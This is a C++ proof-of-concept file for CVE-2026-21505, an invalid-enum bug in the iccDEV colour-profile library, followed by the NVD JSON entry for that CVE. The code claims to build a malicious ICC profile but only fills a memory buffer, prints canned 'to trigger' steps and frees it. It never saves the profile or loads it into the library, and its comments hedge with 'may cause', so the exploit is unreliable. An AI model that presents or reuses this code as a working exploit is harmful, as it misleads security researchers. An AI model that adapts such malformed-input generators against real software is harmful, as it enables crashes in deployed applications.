CVE-2026-21505

// CVE-2026-21505 PoC - Malformed ICC Profile Triggering Invalid Enum Value // This PoC demonstrates the vulnerability in iccDEV < 2.3.1.2 // The vulnerability allows undefined behavior due to invalid enum value handling #include <cstdio> #include <cstdlib> #include <cstring> // ICC Profile Header Structure (simplified) struct ICCProfileHeader { uint32_t size; // Profile size uint32_t cmmType; // CMM signature uint32_t profileVersion; // Profile version uint32_t profileClass; // Device class uint32_t colorSpace; // Color space uint32_t pcs; // PCS (Profile Connection Space) uint32_t creationDateTime[3]; // Creation date/time uint32_t signature; // 'acsp' signature uint32_t primaryPlatform; // Primary platform uint32_t profileFlags; // Profile flags uint32_t manufacturer; // Device manufacturer uint32_t model; // Device model uint32_t deviceAttributes; // Device attributes uint32_t renderingIntent; // Rendering intent // ... other fields }; // Malicious profile creator that triggers invalid enum value unsigned char* createMaliciousICCProfile() { // Allocate buffer for ICC profile unsigned char* profile = new unsigned char[128]; memset(profile, 0, 128); // Set valid header signature 'acsp' profile[36] = 'a'; profile[37] = 'c'; profile[38] = 's'; profile[39] = 'p'; // Set profile version to trigger edge case in enum handling // Version 0x05000000 or similar may cause invalid enum conversion profile[8] = 0x05; // Major version profile[9] = 0x00; // Minor version profile[10] = 0x00; // Bug fix version profile[11] = 0x00; // Set color space to trigger enum handling path // Using a value that causes enum range issues in version parsing profile[16] = 0x00; profile[17] = 0x00; profile[18] = 0x00; profile[19] = 0x00; // May cause invalid enum conversion return profile; } int main(int argc, char* argv[]) { printf("CVE-2026-21505 PoC - iccDEV Invalid Enum Value\n"); printf("This PoC creates a malformed ICC profile that triggers\n"); printf("undefined behavior in iccDEV < 2.3.1.2\n\n"); unsigned char* maliciousProfile = createMaliciousICCProfile(); printf("Malicious ICC profile created at %p\n", maliciousProfile); printf("Profile size: 128 bytes\n"); printf("Header signature: acsp\n"); printf("Profile version: 5.0.0 (triggers enum edge case)\n"); printf("\nTo trigger vulnerability:\n"); printf("1. Load this profile using iccDEV library < 2.3.1.2\n"); printf("2. The library will attempt to convert version to enum\n"); printf("3. Invalid enum value causes undefined behavior\n"); printf("4. Result: Application crash or unpredictable behavior\n"); delete[] maliciousProfile; return 0; }

{"cve": {"id": "CVE-2026-21505", "sourceIdentifier": "[email protected]", "published": "2026-01-07T18:15:54.700", "lastModified": "2026-01-12T16:35:08.800", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles ICC de gestión de color. Antes de la versión 2.3.1.2, iccDEV presenta un comportamiento indefinido debido a un valor de enumeración no válido. Este problema ha sido parcheado en la versión 2.3.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-843"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/3bbe2088b2796cf0aa4f7fa19f7ccd9ad1c7aba5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/b1bb72fc3e9442ee1355aabae7314bb7d3fc9d41", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/361", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/419", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j577-8285-qrf9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/361", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}